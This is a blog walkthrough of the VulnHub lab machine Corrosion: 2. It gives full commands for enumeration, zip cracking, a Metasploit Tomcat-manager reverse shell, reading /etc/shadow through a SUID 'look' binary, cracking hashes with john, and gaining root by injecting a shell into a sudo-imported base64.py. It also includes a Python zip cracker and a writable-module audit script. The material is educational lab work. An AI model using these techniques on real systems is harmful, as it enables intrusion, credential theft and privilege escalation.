This article walks through the VulnHub penetration-testing target machine Corrosion: 2.

Vulnhub target machine introduction:

Vulnhub is a practice range that provides a wide variety of vulnerable platforms. You download the virtual machine images, open them in a local VM, and then work through penetration testing, privilege escalation, vulnerability exploitation and code auditing challenges, almost like playing a game.

This is a vulnerable target machine; as usual, the goal is to find the flags.

Difficulty: Medium

Vulnhub target machine download:

Official website download: https://download.vulnhub.com/corrosion/Corrosion2.ova

Vulnhub target machine installation:

After downloading, extract the package and open the .ova file in VMware.


Detailed Explanation of Vulnhub Target Machine Vulnerabilities:

①: Information gathering:

On Kali, use arp-scan -l or netdiscover to discover hosts on the network.

Attacking machine: Kali, IP 192.168.0.104. Target machine IP: 192.168.0.100

Then scan the target's ports and services with the command: nmap -sS -sV -T4 -n -p- 192.168.0.100

Ports 22, 80 and 8080 are open. Port 80 runs Apache and port 8080 runs Tomcat (browsing to it shows the default Tomcat page). Next, enumerate the two web ports with the usual tools: dirb, dirsearch, whatweb, gobuster, nikto, etc.

dirsearch -u http://192.168.0.100  # nothing usable here (when the top level turns up nothing, scan second-level directories)
dirsearch -u http://192.168.0.100:8080  # this round of enumeration turns up backup.zip and readme.txt
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip  # nothing usable
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404  # -b hides 400/404 responses so real hits stand out
whatweb http://192.168.0.100:8080  # fingerprint the web stack

Enumeration also gives us a user name: randy. Download backup.zip; it is password-protected, so brute-force it. The password turns out to be the same one used in Corrosion: 1: @administrator_hi5

For the detailed cracking method (zip2john + john, or fcrackzip), see the first article in the Corrosion series: http://t.csdn.cn/XmjAR
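The archive uses the traditional PKWARE ("ZipCrypto") scheme, which is why zip2john/fcrackzip can brute-force it quickly. Below is an added example of my own (not code from the original article or from the Corrosion author) showing what those tools do: it builds a small encrypted archive to stand in for backup.zip, then runs a dictionary attack on it with nothing but the standard library. The entry name, its contents and the candidate list are constructed for the demo; the password is the one from the text.

```python
import io
import struct
import zipfile
import zlib


def _crc_table():
    # Reflected CRC-32 table (polynomial 0xEDB88320) used by ZipCrypto's key schedule.
    table = []
    for i in range(256):
        crc = i
        for _ in range(8):
            crc = (crc >> 1) ^ 0xEDB88320 if crc & 1 else crc >> 1
        table.append(crc)
    return table


_TABLE = _crc_table()


class ZipCrypto:
    """Traditional PKWARE stream cipher, encryption direction only (used to
    build the test archive; this is the scheme zip2john/fcrackzip attack)."""

    def __init__(self, password: bytes):
        self.keys = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        k = self.keys
        k[0] = (k[0] >> 8) ^ _TABLE[(k[0] ^ b) & 0xFF]
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = (k[2] >> 8) ^ _TABLE[(k[2] ^ (k[1] >> 24)) & 0xFF]

    def encrypt(self, plaintext: bytes) -> bytes:
        out = bytearray()
        for p in plaintext:
            t = (self.keys[2] | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)  # the key state advances on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name: str, data: bytes, password: bytes) -> bytes:
    """Build a single-entry, stored (uncompressed), ZipCrypto-encrypted archive."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes, then the high byte of the CRC.
    # That byte is the only cheap pre-check a decryptor has before it must
    # decrypt the whole entry and compare the full CRC.
    body = ZipCrypto(password).encrypt(bytes(11) + bytes([crc >> 24]) + data)
    fname = name.encode()
    dos_time, dos_date = 0, ((2023 - 1980) << 9) | (6 << 5) | 26  # constructed timestamp
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, 1, 0, dos_time, dos_date,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 1, 0,
                          dos_time, dos_date, crc, len(body), len(data),
                          len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def read_entry(zip_bytes: bytes, name: str, password: str) -> bytes:
    """Decrypt one entry with the stdlib; raises if the password is wrong."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(name, pwd=password.encode())


def crack_zip(zip_bytes: bytes, wordlist):
    """Dictionary attack on the first entry; returns the password that decrypts it."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for word in wordlist:
            try:
                zf.read(name, pwd=word.encode())
                return word
            except RuntimeError:
                continue  # header check byte mismatch: 255 of every 256 wrong guesses end here
            except zipfile.BadZipFile:
                continue  # passed the one-byte check but failed the CRC: false positive, keep going
    return None


if __name__ == "__main__":
    # Constructed stand-in for backup.zip plus a tiny wordlist; not the box's real files.
    archive = make_encrypted_zip("tomcat-users.xml", b"<tomcat-users/>\n", b"@administrator_hi5")
    candidates = ["123456", "password", "tomcat", "@administrator_hi5", "letmein"]
    print("password:", crack_zip(archive, candidates))
```

Two things the example makes explicit. A wrong password almost always fails on the 12-byte encryption header, so each guess costs microseconds and a full run through rockyou.txt is realistic; that is the cheap pre-check the dedicated crackers exploit. But about 1 in 256 wrong guesses passes that check byte and only fails the CRC, so a cracker must verify the whole entry (or several entries) before reporting success, which is why a truncated or hand-edited archive can produce false hits.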


Inside the archive, the configuration file tomcat-users.xml contains two sets of credentials: manager/melehifokivai and admin/melehifokivai. Trying them on the Tomcat manager login works!


②: Getting a shell through the Tomcat manager upload with MSF:

Open msfconsole, load the module with use exploit/multi/http/tomcat_mgr_upload, and set its parameters:

set RHOST 192.168.0.100
set RPORT 8080
set HttpUsername manager
set HttpPassword melehifokivai
set LHOST 192.168.0.104
run

RPORT must be 8080, the port Tomcat listens on (80 is the Apache server); LHOST is Kali's address, used for the reverse payload.


Drop into a shell with the shell command. Under /home there are three users. The jaye directory cannot be entered (no permission); randy's can, and user.txt in it gives the first flag!

Next try switching to the jaye user (su jaye). Surprisingly, the Tomcat password melehifokivai works! su needs a proper terminal, so first upgrade the shell with Python: python3 -c 'import pty;pty.spawn("/bin/bash")'

Check /etc/passwd with cat /etc/passwd; since SSH is available on port 22, switch to an SSH login as jaye with the same password to make the rest of the work more convenient!

List the SUID binaries, i.e. files that execute with root's permissions: find / -perm -u=s -type f 2>/dev/null

③: Reading files you are not authorized to read with look:

Among the results is a copy of the look command that can be abused (the first time I have come across it). Running ./look '' "$LFILE" prints every line of $LFILE, including files I otherwise have no permission to read.

How to abuse look (from GTFOBins): https://gtfobins.github.io/gtfobins/look/

In fact, this read can be pointed straight at root's flag: ./look '' /root/root.txt
Read /etc/shadow and /etc/passwd the same way, combine them with the unshadow command into one file of hashes to crack, and then brute-force it with john (copy the complete contents of both files, or nothing will come out). The dictionary is rockyou.txt (this takes a long time!).

./look '' /etc/passwd > passwd
./look '' /etc/shadow > shadow
unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt


The cracked password for randy is: 07051986randy
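To make the "copy everything or nothing comes out" caveat concrete, here is an added example of my own (not code from the original article) that does the unshadow merge in Python and reports, per account, whether john has anything to crack. The passwd and shadow contents are constructed samples with placeholder hash strings, not the real files from the box.

```python
# Constructed sample files standing in for the box's /etc/passwd and /etc/shadow;
# the hash fields are placeholders, not real sha512crypt digests.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jaye:x:1000:1000:jaye:/home/jaye:/bin/bash
randy:x:1001:1001:randy:/home/randy:/bin/bash
tomcat:x:1002:1002::/opt/tomcat:/bin/false
"""
SHADOW_SAMPLE = """\
root:!:18917:0:99999:7:::
daemon:*:18375:0:99999:7:::
jaye:$6$saltjaye$PLACEHOLDERHASHjaye:18917:0:99999:7:::
randy:$6$saltrandy$PLACEHOLDERHASHrandy:18917:0:99999:7:::
"""

# crypt(3) prefixes and the john --format name they correspond to
HASH_FORMATS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}


def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow the way unshadow(8) does: the 'x' in the passwd
    password field is replaced by the real hash from shadow, keyed on user name.
    Returns (merged_lines, report); report says per user whether john can work
    on the line at all."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            user, hash_field = line.split(":")[:2]
            hashes[user] = hash_field
    merged, report = [], {}
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        user = fields[0]
        if user not in hashes:
            # No shadow counterpart (truncated copy?): the line keeps its 'x'
            # and john has nothing to crack for this user.
            merged.append(line)
            report[user] = "missing from shadow (incomplete copy?)"
            continue
        fields[1] = hashes[user]
        merged.append(":".join(fields))
        if hashes[user] in ("", "*", "!", "!!") or hashes[user].startswith("!"):
            report[user] = "locked/no password, john will skip"
        else:
            fmt = next((f for p, f in HASH_FORMATS.items() if hashes[user].startswith(p)), "unknown")
            report[user] = "crackable: " + fmt
    return merged, report


if __name__ == "__main__":
    lines, report = unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)
    print("\n".join(lines))
    for user, status in report.items():
        print(user, "->", status)
```

The report also tells you which --format to pass if john complains that the hash type is ambiguous; for modern Ubuntu targets that is almost always --format=sha512crypt, and passing it explicitly is the usual fix when john refuses to start.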

④: Privilege escalation via a sudo rule for randombase64.py

After logging in as randy, do another round of enumeration: id, whoami, sudo -l. sudo -l shows that the script randombase64.py can be run as root with sudo.

The script imports Python's base64 module, and that module file under the system library is writable, so we can write a shell spawn straight into it. First locate the file, then edit it with vi or nano (in nano, save and exit with Ctrl+X; it took me a while the first time).

cd /usr/lib/python3.8
ls -al base*  # locate base64.py and append the following two lines to it
import os
os.system("/bin/bash")
sudo /usr/bin/python3.8 /home/randy/randombase64.py  # run the script with sudo; when it imports base64 the shell spawns as root. python3.8 is the interpreter used here; if it does not work, try another installed version.
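A check a practitioner would want here: the escalation works only because a module on the interpreter's import path is writable by an unprivileged user. The following added example (mine, not code from the original article or from the box) walks a list of import paths and reports world-writable .py files and directories, then runs itself against a constructed sample tree. The names python3.8 and base64.py in the sample simply mirror the box; the list of paths you pass in is an assumption, and sys.path of the current interpreter is used for the live audit.

```python
import os
import stat
import sys
import tempfile


def _check(path, name):
    """Classify one filesystem entry; returns a reason string or None."""
    try:
        mode = os.lstat(path).st_mode
    except OSError:
        return None
    if stat.S_ISLNK(mode):
        return None
    if stat.S_ISDIR(mode) and (mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX):
        return "world-writable directory: a new or shadowing module can be dropped here"
    if stat.S_ISREG(mode) and name.endswith(".py") and (mode & stat.S_IWOTH):
        return "world-writable module (mode %o)" % (mode & 0o777)
    return None


def world_writable_python(paths):
    """Walk each import path and report directories and .py files that any
    local user may modify. Whatever is listed is a privilege-escalation path
    as soon as a root process (e.g. a script run through sudo) imports it."""
    findings = []
    for base in paths:
        if not os.path.isdir(base):
            continue
        reason = _check(base, os.path.basename(base))
        if reason:
            findings.append((base, reason))
        for root, dirs, files in os.walk(base):
            for name in dirs + files:
                path = os.path.join(root, name)
                reason = _check(path, name)
                if reason:
                    findings.append((path, reason))
    return findings


def demo_tree(root):
    """Constructed sample library tree: a correctly protected os.py, a
    world-writable base64.py (the misconfiguration on the box) and a
    world-writable site-packages directory."""
    lib = os.path.join(root, "python3.8")
    os.makedirs(os.path.join(lib, "site-packages"))
    os.chmod(lib, 0o755)  # explicit, so the result does not depend on the umask
    for name, mode in (("os.py", 0o644), ("base64.py", 0o666)):
        with open(os.path.join(lib, name), "w") as fh:
            fh.write("# sample module\n")
        os.chmod(os.path.join(lib, name), mode)
    os.chmod(os.path.join(lib, "site-packages"), 0o777)
    return lib


def run_demo():
    """Audit the constructed tree; returns the flagged paths relative to it."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = demo_tree(tmp)
        return sorted(os.path.relpath(p, lib) for p, _ in world_writable_python([lib]))


if __name__ == "__main__":
    print("demo findings:", run_demo())
    for path, reason in world_writable_python(sys.path):  # audit this interpreter's import path
        print(path, "-", reason)
```

sudo's default env_reset strips PYTHONPATH, so an attacker cannot simply point the root-run interpreter at their own directory; that is exactly why a writable file inside the real library directory is the bug. The same check applies to the script named in the sudo rule and to the directory it lives in.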


⑤: Get the flag:

With a root shell, root.txt gives the final flag, and this walkthrough is complete. Thanks for reading!!

Vulnhub target penetration summary:

This machine sits a little above medium difficulty, because several steps are fiddly.
1. Information gathering: arp-scan -l to obtain the IP address, nmap for the ports, the web scanning tools nikto, dirb, dirbuster, whatweb, ffuf and so on, and checking the page source in the browser (F12).
2. MSF exploit/multi/http/tomcat_mgr_upload module to get a shell (you need to know the account password).
3. Cracking the zip with zip2john and fcrackzip (a zip-cracking tool), and working around the john error.
4. Reading files beyond your permissions with the SUID look binary: ./look '' filename
5. sudo privilege escalation by writing a shell spawn into base64.py (a new technique for me!)
One more route that this article does not demonstrate, which you can look into yourself: Linux Polkit, CVE-2021-4034.

The Corrosion series is finished. It has been a rewarding day with a lot of new techniques learned (Yeah!).
Writing this was not easy; I hope it helps. If you liked it, please like, favourite and follow. Your happiness is my greatest happiness!!


Origin blog.csdn.net/Aluxian_/article/details/131368294